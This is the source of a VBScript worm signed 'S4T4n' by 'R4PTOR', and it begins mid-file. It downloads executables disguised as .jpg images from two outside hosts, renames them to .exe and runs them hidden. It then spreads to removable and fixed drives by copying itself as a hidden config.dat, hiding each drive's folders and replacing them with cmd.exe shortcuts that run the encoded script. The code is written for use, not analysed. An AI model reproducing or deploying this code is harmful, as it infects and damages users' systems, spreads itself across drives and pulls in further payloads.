a = objXMLHTTP.getResponseHeader("Content-Length")
Set objXMLHTTP = Nothing
'msgbox"2"
Set loFSO = CreateObject("Scripting.FileSystemObject")
loFSO.CopyFile ""&third&"system.jpg",""&third&"system.exe"
loFSO.DeleteFile ""&third&"system.jpg"
Set oFSO = CreateObject("Scripting.FileSystemObject")
stFichier = ""&third&"system.exe"
Set oFl = oFSO.GetFile(stFichier)
b = oFl.size
If ""&a&"" = ""&b&"" Then
Set variable=createobject("wscript.shell")
variable.run """"&var1&"\security\system.exe""",0,False
Else
End If
'
'---------------------------------------------------------------------------
' explorer . x
'---------------------------------------------------------------------------
Set wshshell=createobject("wscript.shell")
first = "http://mysiteweb.freezoy.com"
secon = "explorer."
ext = "jpg"
strFileURL = ""&first&""&secon&""&ext&""
third = ""&var1&"\kernel\"
strHDLocation = ""&third&""&secon&""&ext&""
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, FALSE
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = _
CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream. _
Write _
objXMLHTTP _
.ResponseBody
objADOStream. _
Position = 0
Set objFSO = _
Createobject("Scripting.FileSystemObject")
If objFSO. _
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream _
.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End If
a = objXMLHTTP.getResponseHeader("Content-Length")
Set objXMLHTTP = Nothing
'msgbox"2"
Set loFSO = CreateObject("Scripting.FileSystemObject")
loFSO.CopyFile ""&var1&"\kernel\explorer.jpg",""&var1&"\kernel\explorer.exe"
loFSO.DeleteFile ""&var1&"\kernel\explorer.jpg"
Set oFSO = CreateObject("Scripting.FileSystemObject")
stFichier = ""&third&"explorer.exe"
Set oFl = oFSO.GetFile(stFichier)
b = oFl.size
If ""&a&"" = ""&b&"" Then
Set variable=createobject("wscript.shell")
variable.run """"&var1&"\Kernel\explorer.exe""",0,False
Else
End If
'
'---------------------------------------------------------------------------
' update . jpg
'---------------------------------------------------------------------------
Set wshshell=createobject("wscript.shell")
first = "http://babybot.125mb.com/"
secon = "update."
ext = "jpg"
strFileURL = ""&first&""&secon&""&ext&""
third = ""&var1&"\kernel\"
strHDLocation = ""&third&""&secon&""&ext&""
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, FALSE
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = _
CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream. _
Write _
objXMLHTTP _
.ResponseBody
objADOStream. _
Position = 0
Set objFSO = _
Createobject("Scripting.FileSystemObject")
If objFSO. _
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream _
.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End If
a = objXMLHTTP.getResponseHeader("Content-Length")
Set objXMLHTTP = Nothing
'msgbox"2"
Set loFSO = CreateObject("Scripting.FileSystemObject")
loFSO.CopyFile ""&var1&"\kernel\update.jpg",""&var1&"\kernel\Update.exe"
loFSO.DeleteFile ""&var1&"\kernel\update.jpg"
Set oFSO = CreateObject("Scripting.FileSystemObject")
stFichier = ""&third&"Update.exe"
Set oFl = oFSO.GetFile(stFichier)
b = oFl.size
If ""&a&"" = ""&b&"" Then
Set variable=createobject("wscript.shell")
variable.run """"&var1&"\kernel\Update.exe""",0,False
Else
End If
'
Wend
'
'---------------------------------------------------------------------------
' !Nf3cT!o|\| Headers
'---------------------------------------------------------------------------
'
detecterracines
Sub detecterracines()
'
'---------------------------------------------------------------------------
' Usb f()
'---------------------------------------------------------------------------
'
Set fsO = CreateObject("Scripting.FileSystemObject")
Set wshshell=createobject("wscript.shell")
Dim fso, d, dc, s, n
Set dc = fso.Drives
For Each d in dc
racine = d.Driveletter & ":"
u= detectamovibles(root)
'msgbox racine
If u = "Amovible" Or u = "Fixe" And d.isready And racine <> "A:" Then
'
Set fsO = CreateObject("Scripting.FileSystemObject")
If fsO.FileExists(""&d&"\config.dat") Then
Dim oFso, f
Dim ts, nl
Set oFso = CreateObject("Scripting.FileSystemObject")
Set f = oFso.OpenTextFile(""&d&"\config.dat", ForReading)
ts = f.ReadAll '-- Rd File
If ""&f.line&"" > 30 Then
f.close
'
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd /K xcopy /C /H /Y /R """&d&"\config.dat"" ""%systemdrive%\security"" & attrib -s -h ""%systemdrive%\security\*.dat"" & ren ""%systemdrive%\security\*.dat"" blood.dat & EXIT",0
oShell.run "cmd /K xcopy /C /H /Y /R """&d&"\config.dat"" ""%systemdrive%\kernel"" & attrib -s -h ""%systemdrive%\kernel\*.dat"" & ren ""%systemdrive%\kernel\*.dat"" r00t3r & attrib +s +h ""%systemdrive%\kernel\*.*"" & EXIT",0
Set oShell = Nothing
End If
'
Set oFso = CreateObject("Scripting.FileSystemObject")
Set f = oFso.OpenTextFile(""&d&"\config.dat", ForReading)
'
ts = f.ReadAll '-- Read File
If ""&f.line&"" < 30 Then
f.close
'
Set fsO = CreateObject("Scripting.FileSystemObject")
fso.deletefile(""&d&"\config.dat"),true
End If
'
Set oFso = CreateObject("Scripting.FileSystemObject")
Set f = oFso.OpenTextFile(""&d&"\config.dat", ForReading)
'
ts = f.ReadAll '-- R" File
If ""&f.line&"" = 30 Then
f.close
Dim stFichier
Dim oFl
Set oFSO = CreateObject("Scripting.FileSystemObject")
stFichier = ""&d&"\config.dat"
Set oFl = oFSO.GetFile(stFichier)
Set f = ofso.GetFile(stFichier)
fdate = f.DateLastModified
fname = f.Name
dtDiffFile = DateDiff("d", Now, fdate)
If dtDiffFile < 0 Then
fso.DeleteFile(stFichier),true
Dim oShell
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd /K cd/d ""%systemdrive%\security"" & copy /b /y blood.dat + & EXIT",0
Set oShell = Nothing
End If
End If
Else
'
'---------------------------------------------------------------------------
' u|s|b spr34d
'---------------------------------------------------------------------------
'
tmpdir=shell.ExpandEnvironmentStrings("%temp%")
nomficl=tmpdir & "\tmp.bat"
' msgbox nomfic
Set f = fso.OpenTextFile(nomficl, ForWriting , true)
f.writeline "del/f/q/a """&d&"\*.vbe"" "
f.writeline "del/f/q/a """&d&"\*.lnk"" "
f.writeline "del/f/q/a """&d&"\config.dat"" "
f.writeline "del/f/q/a """&d&"\autorun.inf"" "
f.writeline "del/f/q/a """&d&"\microsoft.dat"" "
f.writeline "xcopy /C /H /Y /R """&MyF&""" """&d&"\"" "
f.writeline "ren """&d&"\blood.dat"" config.dat "
f.writeline "attrib +s +H """&d&"\config.dat"" "
f.writeline "del/f/q/a ""%systemdrive%\*.lnk"" "
f.writeline "del/f/q/a ""%systemdrive%\autorun.inf"" "
f.close
'
Set variable = createobject("wscript.shell")
variable.run ""&nomficl&"" ,0,true
fso.DeleteFile nomficl, TRUE
'
'---------------------------------------------------------------------------
' LNK -- 10ver6on l0l
'---------------------------------------------------------------------------
'
Const ForWriting = 2
RootFolder = ""&d&""
'Const DestinationFile = "FolderList"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSO.GetFolder(RootFolder)
Set colSubfolders = objFolder.Subfolders
For Each objSubfolder in colSubfolders
Exit For
'wscript.echo objSubfolder.Name
Next
Set oShell = CreateObject("WScript.Shell")
sDesktop = WSHShell.SpecialFolders("Desktop")
Set oSLink = WSHShell.CreateShortcut(""&d&"\"&objSubfolder.Name&".lnk")
strTarget = oShell.ExpandEnvironmentStrings("%windir%")
oSLink.TargetPath = strTarget & "\system32\cmd.exe"
oSLink.Arguments = "/c start WScRiPt.EXe /e:VBScRIpt.ENcOdE config.dat & C:\WINDOWS\explorer.exe "&objSubfolder.Name&" "
oSLink.WindowStyle = 7
oSLink.IconLocation = "%SystemRoot%\system32\SHELL32.dll,-4"
oSLink.Description = ""&d&""
oSLink.Save
'
'---------------------------------------------------------------------------
' +H
'---------------------------------------------------------------------------
On Error Resume Next
Set objFSo = CreateObject("scripting.FileSystemObject")
Set objFile = objFSo.GetFile(""&d&"\"&objSubfolder.Name&".lnk")
'
objFile.Attributes = 1 'R0
'* * * * * * *
'*************
'* * * * * * *
Set objFSO = CreateObject("Scripting.FileSystemObject" )
Set objFolder = objFSO.GetFolder(""&d&"\"&objSubfolder.Name&"")
objFolder.Attributes = objFolder.Attributes XOR 6
'
End If
End If
Next
End Sub
'
' Classifies the drive that contains drvpath.
' Returns "Amovible" (French for removable) when DriveType is 1 and "Fixe"
' (fixed) when DriveType is 2. For any other drive type t is never assigned,
' so the function returns an empty value.
'   drvpath - any path; it is resolved to an absolute path and then to its
'             drive name before the lookup
Function detectamovibles(drvpath)
' s is declared here but not used in this function.
Dim fso, d, s, t
Set fsO = CreateObject("Scripting.FileSystemObject")
Set d = fso.GetDrive(fso.GetDriveName(fso.GetAbsolutePathName(drvpath)))
Select Case d.DriveType
Case 1: t = "Amovible"
Case 2: t = "Fixe"
End Select
detectamovibles = t
End Function
'
'========================================================================================='
'
' C0d3 N4me : S4T4n
' Cr34t0r : R4PTOR
' Created for personal use , modifications or others are not authorized
' For more informations, looking 4 me { - CNG4L on Race }
'
'========================================================================================='
'
'''''||
''''''''''''''''''--------------- . . . . . . .
''''''''''''''''''
'''''||
'